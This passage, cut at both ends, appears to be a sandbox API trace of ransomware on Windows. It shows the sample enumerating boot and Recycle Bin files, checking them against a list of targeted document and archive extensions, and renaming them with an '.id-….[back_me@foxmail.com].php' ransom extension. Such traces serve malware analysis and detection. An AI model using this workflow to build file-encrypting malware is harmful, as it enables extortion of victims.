(lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.567] lstrlenW (lpString=".dbf") returned 4 [0241.567] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.567] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.567] lstrlenW (lpString=".1cd") returned 4 [0241.567] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.567] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.568] lstrlenW (lpString=".jpg") returned 4 [0241.568] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.568] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.568] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.568] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.568] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x32eff1c | out: lpFileSize=0x32eff1c*=94800) returned 1 [0241.568] CloseHandle (hObject=0x244) returned 1 [0241.568] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0241.568] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.568] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.568] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.568] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.568] lstrlenW (lpString=".doc") returned 4 [0241.568] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.568] lstrlenW (lpString=".docx") returned 5 [0241.568] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.568] lstrlenW (lpString=".pdf") returned 4 [0241.568] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.569] lstrlenW (lpString=".xls") returned 4 [0241.569] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.569] lstrlenW (lpString=".xlsx") returned 5 [0241.569] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.569] lstrlenW (lpString=".ppt") returned 4 [0241.569] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.569] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.569] lstrlenW (lpString=".zip") returned 4 [0241.569] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.569] lstrlenW (lpString=".rar") returned 4 [0241.569] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.569] lstrlenW (lpString=".bz2") returned 4 [0241.569] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.569] lstrlenW (lpString=".7z") returned 3 [0241.569] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.569] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.569] lstrlenW (lpString=".dbf") returned 4 [0241.569] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.569] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.569] lstrlenW (lpString=".1cd") returned 4 [0241.569] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.569] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.569] lstrlenW (lpString=".jpg") returned 4 [0241.569] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.569] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.569] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.569] lstrlenW (lpString=".doc") returned 4 [0241.569] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.569] lstrlenW (lpString=".docx") returned 5 [0241.569] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.569] lstrlenW (lpString=".pdf") returned 4 [0241.570] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.570] lstrlenW (lpString=".xls") returned 4 [0241.570] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.570] lstrlenW (lpString=".xlsx") returned 5 [0241.570] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.570] lstrlenW (lpString=".ppt") returned 4 [0241.570] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.570] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.570] lstrlenW (lpString=".zip") returned 4 [0241.570] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.570] lstrlenW (lpString=".rar") returned 4 [0241.570] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.570] lstrlenW (lpString=".bz2") returned 4 [0241.570] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.570] lstrlenW (lpString=".7z") returned 3 [0241.570] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.570] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.570] lstrlenW (lpString=".dbf") returned 4 [0241.570] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.570] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.570] lstrlenW (lpString=".1cd") returned 4 [0241.570] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.570] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0241.570] lstrlenW (lpString=".jpg") returned 4 [0241.570] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.570] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.571] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.571] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.571] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x32eff1c | out: lpFileSize=0x32eff1c*=85056) returned 1 [0241.571] CloseHandle (hObject=0x244) returned 1 [0241.571] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0241.571] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.571] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.571] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.572] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.572] lstrlenW (lpString=".doc") returned 4 [0241.572] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.572] lstrlenW (lpString=".docx") returned 5 [0241.572] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.572] lstrlenW (lpString=".pdf") returned 4 [0241.572] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.572] lstrlenW (lpString=".xls") returned 4 [0241.572] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.572] lstrlenW (lpString=".xlsx") returned 5 [0241.572] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.572] lstrlenW (lpString=".ppt") returned 4 [0241.572] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.572] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.572] lstrlenW (lpString=".zip") returned 4 [0241.572] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.572] lstrlenW (lpString=".rar") returned 4 [0241.572] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.572] lstrlenW (lpString=".bz2") returned 4 [0241.572] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.572] lstrlenW (lpString=".7z") returned 3 [0241.572] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.572] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.572] lstrlenW (lpString=".dbf") returned 4 [0241.572] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.572] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.572] lstrlenW (lpString=".1cd") returned 4 [0241.572] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.572] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.572] lstrlenW (lpString=".jpg") returned 4 [0241.572] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.573] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.573] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.573] lstrlenW (lpString=".doc") returned 4 [0241.573] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.573] lstrlenW (lpString=".docx") returned 5 [0241.573] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.573] lstrlenW (lpString=".pdf") returned 4 [0241.573] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.573] lstrlenW (lpString=".xls") returned 4 [0241.573] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.573] lstrlenW (lpString=".xlsx") returned 5 [0241.573] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.573] lstrlenW (lpString=".ppt") returned 4 [0241.573] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.573] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.573] lstrlenW (lpString=".zip") returned 4 [0241.573] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.573] lstrlenW (lpString=".rar") returned 4 [0241.573] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.573] lstrlenW (lpString=".bz2") returned 4 [0241.573] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.573] lstrlenW (lpString=".7z") returned 3 [0241.573] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.573] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.573] lstrlenW (lpString=".dbf") returned 4 [0241.573] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.573] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.573] lstrlenW (lpString=".1cd") returned 4 [0241.573] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.573] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0241.573] lstrlenW (lpString=".jpg") returned 4 [0241.574] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.574] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.574] lstrlenW (lpString="memtest.exe.mui") returned 15 [0241.574] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.574] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x32eff1c | out: lpFileSize=0x32eff1c*=43600) returned 1 [0241.574] CloseHandle (hObject=0x244) returned 1 [0241.574] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0241.574] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.574] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.574] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.574] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.574] lstrlenW (lpString=".doc") returned 4 [0241.574] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.574] lstrlenW (lpString=".docx") returned 5 [0241.574] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.574] lstrlenW (lpString=".pdf") returned 4 [0241.574] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.574] lstrlenW (lpString=".xls") returned 4 [0241.574] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.575] lstrlenW (lpString=".xlsx") returned 5 [0241.575] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.575] lstrlenW (lpString=".ppt") returned 4 [0241.575] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.575] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.575] lstrlenW (lpString=".zip") returned 4 [0241.575] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.575] lstrlenW (lpString=".rar") returned 4 [0241.575] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.575] lstrlenW (lpString=".bz2") returned 4 [0241.575] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.575] lstrlenW (lpString=".7z") returned 3 [0241.575] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.575] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.575] lstrlenW (lpString=".dbf") returned 4 [0241.575] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.575] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.575] lstrlenW (lpString=".1cd") returned 4 [0241.575] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.575] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.575] lstrlenW (lpString=".jpg") returned 4 [0241.575] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.575] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.575] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.575] lstrlenW (lpString=".doc") returned 4 [0241.575] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.575] lstrlenW (lpString=".docx") returned 5 [0241.575] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.575] lstrlenW (lpString=".pdf") returned 4 [0241.575] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.576] lstrlenW (lpString=".xls") returned 4 [0241.576] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.576] lstrlenW (lpString=".xlsx") returned 5 [0241.576] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.576] lstrlenW (lpString=".ppt") returned 4 [0241.576] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.576] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.576] lstrlenW (lpString=".zip") returned 4 [0241.576] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.576] lstrlenW (lpString=".rar") returned 4 [0241.576] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.576] lstrlenW (lpString=".bz2") returned 4 [0241.576] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.576] lstrlenW (lpString=".7z") returned 3 [0241.576] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.576] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.576] lstrlenW (lpString=".dbf") returned 4 [0241.576] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.576] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.576] lstrlenW (lpString=".1cd") returned 4 [0241.576] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.576] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0241.576] lstrlenW (lpString=".jpg") returned 4 [0241.576] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.576] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.576] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.576] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.577] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x32eff1c | out: lpFileSize=0x32eff1c*=90192) returned 1 [0241.577] CloseHandle (hObject=0x244) returned 1 [0241.577] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0241.577] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.577] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.577] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0241.577] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0241.577] lstrlenW (lpString=".doc") returned 4 [0241.577] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.577] lstrlenW (lpString=".docx") returned 5 [0241.577] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.577] lstrlenW (lpString=".pdf") returned 4 [0241.577] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.577] lstrlenW (lpString=".xls") returned 4 [0241.577] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.577] lstrlenW (lpString=".xlsx") returned 5 [0241.577] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.577] lstrlenW (lpString=".ppt") returned 4 [0241.577] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.577] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0241.577] lstrlenW (lpString=".zip") returned 4 [0241.577] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.577] lstrlenW (lpString=".rar") returned 4 [0241.577] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.577] lstrlenW (lpString=".bz2") returned 4 [0241.578] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.578] lstrlenW (lpString=".7z") returned 3 [0241.578] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.578] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0242.021] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 Thread: id = 57 os_tid = 0x62c [0241.351] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0xbebef0 [0241.351] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3cf0048 [0241.352] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dfb8 [0241.352] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb99c00 [0241.352] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dfd0 [0241.352] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x3df0020 [0241.352] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dfe8 [0241.352] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dfe8, Size=0x20) returned 0xbbd748 [0241.352] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dfe8 [0241.352] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dfe8, Size=0x20) returned 0xbbd770 [0241.352] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0241.352] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0241.352] Wow64DisableWow64FsRedirection (in: OldValue=0x342ff58 | out: OldValue=0x342ff58*=0x0) returned 1 [0241.352] lstrlenW (lpString="kernel32.dll") returned 12 [0241.352] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbd748 | out: hHeap=0xb00000) returned 1 [0241.352] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0241.352] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbd770 | out: hHeap=0xb00000) returned 1 [0241.352] Sleep (dwMilliseconds=0x64) [0241.536] lstrcmpiW (lpString1=".ini", lpString2=".php") returned -1 [0241.536] lstrlenW (lpString="desktop.ini") returned 11 [0241.536] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0241.536] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=129) returned 1 [0241.536] CloseHandle (hObject=0x218) returned 1 [0241.537] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0241.537] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[back_me@foxmail.com].php")) returned 0x26 [0241.550] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.550] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.550] lstrlenW (lpString=".doc") returned 4 [0241.550] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0241.550] lstrlenW (lpString=".docx") returned 5 [0241.550] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0241.550] lstrlenW (lpString=".pdf") returned 4 [0241.550] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0241.550] lstrlenW (lpString=".xls") returned 4 [0241.550] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0241.550] lstrlenW (lpString=".xlsx") returned 5 [0241.550] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0241.550] lstrlenW (lpString=".ppt") returned 4 [0241.550] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0241.550] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.550] lstrlenW (lpString=".zip") returned 4 [0241.550] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0241.550] lstrlenW (lpString=".rar") returned 4 [0241.550] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0241.550] lstrlenW (lpString=".bz2") returned 4 [0241.550] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0241.550] lstrlenW (lpString=".7z") returned 3 [0241.550] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0241.550] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.551] lstrlenW (lpString=".dbf") returned 4 [0241.551] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0241.551] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.551] lstrlenW (lpString=".1cd") returned 4 [0241.551] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0241.551] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.551] lstrlenW (lpString=".jpg") returned 4 [0241.551] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0241.551] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.551] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.551] lstrlenW (lpString=".doc") returned 4 [0241.551] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0241.551] lstrlenW (lpString=".docx") returned 5 [0241.551] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0241.551] lstrlenW (lpString=".pdf") returned 4 [0241.551] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0241.551] lstrlenW (lpString=".xls") returned 4 [0241.551] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0241.551] lstrlenW (lpString=".xlsx") returned 5 [0241.551] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0241.551] lstrlenW (lpString=".ppt") returned 4 [0241.551] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0241.551] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.551] lstrlenW (lpString=".zip") returned 4 [0241.551] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0241.551] lstrlenW (lpString=".rar") returned 4 [0241.551] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0241.551] lstrlenW (lpString=".bz2") returned 4 [0241.551] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0241.551] lstrlenW (lpString=".7z") returned 3 [0241.552] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0241.552] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.552] lstrlenW (lpString=".dbf") returned 4 [0241.552] lstrcmpiW (lpString1=".dbf", 